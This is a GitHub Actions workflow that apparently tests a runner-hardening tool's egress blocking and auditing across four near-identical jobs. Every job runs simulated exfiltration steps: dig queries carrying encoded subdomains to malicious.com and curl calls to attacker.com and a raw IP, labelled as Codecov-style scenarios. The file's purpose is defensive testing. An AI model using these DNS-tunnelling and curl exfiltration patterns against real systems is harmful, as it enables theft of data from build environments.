name: Multiple Jobs
on:
  workflow_dispatch:
permissions:
  contents: read

jobs:
  job1:
    name: Job1
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@3dd2222992cdb2c249f43fc314e8f95b8e6f26d0 # int
        with:
          egress-policy: block
          allowed-endpoints: >
            www.stepsecurity.io:80
            www.bing.com:80

      # DNS Data Exfiltration
      - name: DNS Data Exfiltration
        run: |
          dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
          dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
          dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
          dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
          dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        if: always()
        run: curl attacker.com -L || true


      # Codecov Scenario: Exfiltrate data to a malicious IP
      - name: Data Exfiltration To IP
        if: always()
        run: curl 142.250.190.142 || true

      - name: Allowed Outbound Call www.bing.com
        if: always()
        run: curl www.bing.com:80 || true

      - name: Allowed Outbound Call www.stepsecurity.io
        if: always()
        run: curl www.stepsecurity.io:80 || true

  job2:
    name: Job2
    runs-on: ubuntu-latest
    steps:
      # DNS Data Exfiltration
      - name: Harden Runner
        uses: step-security/harden-runner@55d479fb1c5bcad5a4f9099a5d9f37c8857b2845 # v2.4.1
        with:
          egress-policy: audit

      - name: DNS Data Exfiltration
        run: |
          dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
          dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
          dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
          dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
          dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        if: always()
        run: curl attacker.com -L || true


      # Codecov Scenario: Exfiltrate data to a malicious IP
      - name: Data Exfiltration To IP
        if: always()
        run: curl 142.250.190.142 || true

      - name: Allowed Outbound Call www.bing.com
        if: always()
        run: curl www.bing.com:80 || true

      - name: Allowed Outbound Call www.stepsecurity.io
        if: always()
        run: curl www.stepsecurity.io:80 || true
        
  job3:
    name: Job3
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@3dd2222992cdb2c249f43fc314e8f95b8e6f26d0 # int
        with:
          egress-policy: audit

      # DNS Data Exfiltration
      - name: DNS Data Exfiltration
        run: |
          dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
          dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
          dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
          dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
          dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        if: always()
        run: curl attacker.com -L || true


      # Codecov Scenario: Exfiltrate data to a malicious IP
      - name: Data Exfiltration To IP
        if: always()
        run: curl 142.250.190.142 || true

      - name: Allowed Outbound Call www.bing.com
        if: always()
        run: curl www.bing.com:80 || true

      - name: Allowed Outbound Call www.stepsecurity.io
        if: always()
        run: curl www.stepsecurity.io:80 || true

  job4:
    name: Job4
    runs-on: ubuntu-latest
    steps:
      # DNS Data Exfiltration
      - name: Harden Runner
        uses: step-security/harden-runner@55d479fb1c5bcad5a4f9099a5d9f37c8857b2845 # v2.4.1
        with:
          egress-policy: audit

      - name: DNS Data Exfiltration
        run: |
          dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
          dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
          dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
          dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
          dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        if: always()
        run: curl attacker.com -L || true


      # Codecov Scenario: Exfiltrate data to a malicious IP
      - name: Data Exfiltration To IP
        if: always()
        run: curl 142.250.190.142 || true

      - name: Allowed Outbound Call www.bing.com
        if: always()
        run: curl www.bing.com:80 || true

      - name: Allowed Outbound Call www.stepsecurity.io
        if: always()
        run: curl www.stepsecurity.io:80 || true      
